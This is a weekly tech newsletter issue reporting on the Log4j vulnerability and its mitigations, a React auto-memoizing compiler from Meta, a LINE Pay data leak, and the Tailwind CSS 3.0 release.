Table of Contents

360° IT Check #25 — Log4j, Optimizing React, And More!

Log4j Vulnerability

When your logging framework starts to execute arbitrary code, you know you’re in trouble.

Log4j, the popular Java framework, contained a vulnerability that compromised many apps you might have been using, including Twitter, iCloud, or Steam. The list is much shorter than it could have been. Log4j is likely present in “almost all” major Java-based enterprise apps, and servers. Not even the NSA was safe, as the popular GHIDRA, was vulnerable as a result as well.

According to GreyNoise, a company that analyzes “Internet background noise”, there are around 100 hosts actively scanning for servers with the aforementioned vulnerability.

To check whether your server got scanned, you may verify your visitors by checking this GitHub gist. These IPs, however, are IPs of Tor exit nodes; therefore it will be getting longer. 

Luckily, the way to patch the vulnerability is simple. As Cloudflare explained it:

1. Upgrade to Log4j v2.15.0

2. If you are using Log4j v2.10 or above, and cannot upgrade, then set the property:

log4j2.formatMsgNoLookups=true

Additionally, an environment variable can be set for these same affected versions:

LOG4J_FORMAT_MSG_NO_LOOKUPS=true

3. Or remove the JndiLookup class from the classpath. For example, you can run a command like

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
to remove the class from the log4j-core.

React’s Automatic Optimizations

React is a bit of a “you have to do everything yourself” UI library. Without explicit optimizations, such as memoization, it performs rather poorly, unnecessarily running a lot of code over, and over. Having to keep in mind this, and some other React-specific optimizations, can be a bit of a pickle.

Engineers at Meta seemed to have noticed that, and have showcased a tool to make React perform much better without all the mental overhead for developers. The solution is an automatic compiler, that performs memoization for you, automatically. For a demo, watch the video below.

Line’s Leak

If you ever push a commit with your private key to a public GitHub repository, believe it or not, this is not the worst thing that can happen. Line leaked payments data regarding 133,000 users to GitHub. The leaked data contained details of participants in a “LINE Pay” promotional program: date, time, and user IDs. Even though no cred card or bank account details saw the light of day, they could have been “traced with a little effort.”

The leak happened between September and November 2021; however, the news about it only surfaced last week. The company promised to do better in the future.

Tailwind CSS 3.0

Tailwind CSS, one of the web developers’ favorite tool for creating beautiful UI components, is getting a new major release. There are some improvements both making the developers’ lives easier, with some new features bringing new capabilities on board.

  • “Just-in-Time, all the time.” Faster build times, for the CSS framework. The JIT engine was optional until now, when it’s the only option available. It is also available as a script that one can get from the CDN, and run it in the browser
  • The introduction of the Scroll snap API
  • The styling of form elements without spending much time or effort
  • The introduction of RTL and LTR modifiers. Essential for complete control when building multi-directional websites.
  • “Touch-action” utilities for controlling how a user can zoom in, and scroll on devices with a touch screen

For the full list of features in the new release, take a look at the documentation.

360° IT Check is a weekly publication where we bring you the latest and greatest in the world of tech. We cover topics like emerging technologies & frameworks, news about innovative startups, and other topics which affect the world of tech directly or indirectly.

Like what you’re reading? Make sure to subscribe to our weekly newsletter!
Categories:
Share

Related articles